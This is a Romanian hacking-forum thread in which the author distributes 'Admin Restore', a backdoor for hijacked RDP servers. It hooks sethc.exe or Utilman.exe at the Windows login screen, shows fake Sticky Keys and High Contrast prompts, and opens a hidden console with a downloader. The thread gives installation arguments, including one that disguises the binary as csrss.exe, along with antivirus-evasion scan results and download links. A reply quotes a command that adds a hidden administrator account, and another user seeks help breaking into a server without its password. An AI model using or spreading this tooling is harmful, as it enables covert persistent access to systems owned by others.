Jump to content
Maximus

[RST] Admin Restore

Recommended Posts

[RST] Admin Restore v1.2

M-am folosit de sethc.exe/Utilman.exe doar ca folosesc alta metoda de instalare... nici un fel de "Take Ownership" sau "File Overwrite".

Am creat mesaje false pentru High Contrast / Sticky Keys :

Windows Vista/Server 2008/Windows 7/Server 2008 R2 :

Desktop High Contrast

340381874.png

Desktop Sticky Keys

340384210.png

Winlogon Sticky Keys

340387338.png

Winlogon High Contrast

340391537.png

Windows XP/Windows Server 2003 :

Desktop High Contrast

340394991.png

Desktop Sticky Keys

340395478.png

Winlogon Sticky Keys

34039661.png

Winlogon High Contrast

340397207.png

Cum se foloseste ?

In WinLogon apasam de 5x SHIFT sau ALT (Stanga) + SHIFT (Stanga) + PRINT SCREEN, va aparea unul din mesajele de mai sus ... apasam Ok/Cancel/Yes/No dupa care apasam TAB + SHIFT + ALT + CONTROL + DEL (nu trebuiesc apasate simultan) si va aparea consola de logare :

340402585.png

da, dupa cum vedeti folosesc un "NumPad", doar numere pentru ca in v1.0 & v1.1 (desi nu le-am publicat) pe RDP-uri de Iran apasam Y spre ex si in textbox se tasta Z, NumPad-ul a rezolvat problema.

Daca apasam Login fara sa tastam nimic Consola se va inchide, daca gresim parola de 5x consola se va inchide, iar daca tastam parola corecta va aparea asta :

340406411.png

Avem un Downloader ce salveaza in %TEMP% , putem accesa informatia dupa descarcare prin CMD.exe, un mic Task Run pentru a porni cmd.exe si nu numai .., putem schimba setarile mesajelor false ... si pentru ca am citit postul utilizatorului sllrdp din Market, defapt user567 cu

La rugamintea programatorului care vinde acest tool sa lass un feedback....

Feedback-ul meu e 100 % pozitiv, programul functioneaza exact ca in video-ul de prezentare.

singurul defect daca ias putea spune asa ceva ... e ca iti alegi un pass cand cumperi programul

si nu poti sal mai schimbi.

am adaugat si optiunea de a schimba parola dupa instalare ...

Daca dam click pe bannerul RST va aparea un mic "disclaimer" :

340410707.png

iar daca dam click pe "RST ... Maximus Spide ... Center" va aparea un About :

34041557.png

Cum se instaleaza ?

In primul rand trebuie sa aveti drept de Administrator pe RDP.

Installer-ul arata cam asa :

340419190.png

Command Line Arguments (pentru iHack.exe nu pentru Install.exe):

iHack.exe -i -n:[fisier exe] -pwd:[parola din numere] -h:[sethc.exe/Utilman.exe] -msg:[0/1 unde 0=false si 1=true]

Ex : iHack.exe -i -n:csrss.exe -msg:1 -pwd:31337 -h:sethc.exe

iHack.exe -iHack va deschide "disclaimer-ul" :

340410707.png

Install.exe instaleaza si Msvbvm60.dll (va copia Msvbvm60.dll in directorul unde se va instala iHack.exe), asta pentr ca am intalnit probleme pe unele RDP-uri cu Windows Server 2003 pe ele.

O poza din Winlogon (Laptopul meu)

http://www.7image.ru/pics/0213/340439811.jpg

VIDEO :

SCAN :

File Info

Report Date: 18.02.2013 01:02:29

Link To Scan: http://elementscanner.net//?RE=85539f8891fd8e1dffac2263bebd5808

File Name:iHack.exe

File Size: 625664 bytes

MD5 Hash: beffce95e5afb14fc38260c07901507a

SHA1 Hash: 8e5bacba52013be8cdf4b4b3c0093e5e14eb1736

Status: Clean

Total Results: 0/35

AVG Free-Clean.

ArcaVir-Clean.

Avast 5-Clean.

AntiVir (Avira)-Clean.

BitDefender-Clean.

VirusBuster Internet Security-Clean.

Clam Antivirus-Clean.

COMODO Internet Security-Clean.

Dr.Web-Clean.

eTrust-Vet-Clean.

F-PROT Antivirus-Clean.

F-Secure Internet Security-Clean.

G Data-Clean.

IKARUS Security-Clean.

Kaspersky Antivirus-Clean.

McAfee-Clean.

MS Security Essentials-Clean.

ESET NOD32-Clean.

Norman-Clean.

Norton Antivirus-Clean.

Panda Security-Clean.

A-Squared-Clean.

Quick Heal Antivirus-Clean.

Solo Antivirus-Clean.

Sophos-Clean.

Trend Micro Internet Security-Clean.

VBA32 Antivirus-Clean.

Vexira Antivirus-Clean.

Zoner AntiVirus-Clean.

Ad-Aware-Clean.

BullGuard-Clean.

Immunet Antivirus-Clean.

K7 Ultimate-Clean.

NANO Antivirus-Clean.

VIPRE-Clean.

File Info

Report Date: 17.02.2013 13:02:36

Link To Scan: Scan Result | Element Scanner

File Name:Install.exe

File Size: 219136 bytes

MD5 Hash: aa53152cc4c6567f28022d69aa95f51e

SHA1 Hash: 7f83f71aa8a72b2d8cb2ef41f32c0af700b97a29

Status: INFECTED

Total Results: 8/35

AVG Free-Clean.

ArcaVir-Clean.

Avast 5-Clean.

AntiVir (Avira)- TR/Crypt.ASPM.Gen.

BitDefender- Gen:Heur.ManBat.1.

VirusBuster Internet Security-Clean.

Clam Antivirus-Clean.

COMODO Internet Security-Clean.

Dr.Web-Clean.

eTrust-Vet-Clean.

F-PROT Antivirus-Clean.

F-Secure Internet Security- Gen:Heur.ManBat.1.

G Data- Gen:Heur.ManBat.1.

IKARUS Security- Virus.Win32.VBInject.

Kaspersky Antivirus-Clean.

McAfee-Clean.

MS Security Essentials-Clean.

ESET NOD32-Clean.

Norman-Clean.

Norton Antivirus-Clean.

Panda Security-Clean.

A-Squared- Virus.Win32.VBInject!IK.

Quick Heal Antivirus-Clean.

Solo Antivirus-Clean.

Sophos-Clean.

Trend Micro Internet Security-Clean.

VBA32 Antivirus-Clean.

Vexira Antivirus-Clean.

Zoner AntiVirus-Clean.

Ad-Aware-Clean.

BullGuard- Gen:Heur.ManBat.1.

Immunet Antivirus- Gen:Heur.ManBat.1.

K7 Ultimate-Clean.

NANO Antivirus-Clean.

VIPRE-Clean.

Download Link : https://www.dropbox.com/s/t0ilnhb9yzhixbh/Install.zip Parola : rst

Sper sa va fie folositor.

P.S. Daca gasiti bug-uri/errors va rog lasati un comment sau PM me , descarcati https://www.dropbox.com/s/0hnq4f8q7r0ehsr/detect.exe si lasati ce e in textbox aici (va detecta sistemul de operare). Multumesc

P.S.2 Pentru versiuni personalizate PM me.

@alinh0; eu chiar am crezut ca este vb de GetAdmin.exe, acel exploit pentru Win Server 2003 (parca) .. ma gandeam ca a aparut o varianta noua a exploit-ului dar tu .... http://www.7image.ru/pics/0213/340464789.png :) pus pe troll pustiu ;))

@begood; am descarcat programul lui alinh0 si l-am rulat pe XP in VMWARE, a fost un troll, probabil nu se astepta sa-l rulez in virtual machine. http://www.7image.ru/pics/0213/340464789.png "are el un exploit in C care deschide un cmd ascuns cu net user RubberDuck mudbath /add && net localgroup 'admtors' RubberDuck /add" :)) probabil nici nu stie ca a gresit comanda ...

Update 2/18/2013 :

Command Line Arguments Bug Fixed (-msg:0/1 error)

Link "permanent":

[/FONT]https://rstforums.com/proiecte/AdminRestore.zip

Edited by Nytro
  • Upvote 4
Link to comment
Share on other sites

eu am urmatoarea problema: am un server departe cu portul 3389 deschis. Eu nu stiu parola la Administrator, nici nu am acces sa ii fac instalarea pe acel server 2008 ca apoi sa am acces prin shift chei etc.

cine se pricepe rog sa ma ajute. eu acum incerc cu parole lungi de 6 la 12 caractere

se poate instala exe din exterior? va rog ajutati ma!

nu am linux sa fac exploit.exe care sa l trimit la corespondent. Plus daca pun ipul local 192,168,,,, nu stiu daca va merge listeningul iar ipul real are dupa el mai multe locale

Edited by prenumele
merge pe win xp dar inca nu pe 7
Link to comment
Share on other sites

???????, ????? ????????? ??? ?????:

1. ?????????? ?? ???????

2. ?????? ????????? ?????, ???? ?? ????? ????? ?????????, ?? ?? ?????-?? ??????? ????????????, ? ? ???? ??????? ??????, ? ????????? ?? ????????? ?? ????...

3. ?????? ?????????? ???, ??? ????????? ?????? ?? ???????????, ?? ?????-?? ????????.

???????? ?? ????? ??????? ????????? ?????? ?????????, ??? ??? ? ??????? ??? ???? ??? ????? ???????, ?? ? ????? ?? ?????? ???.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...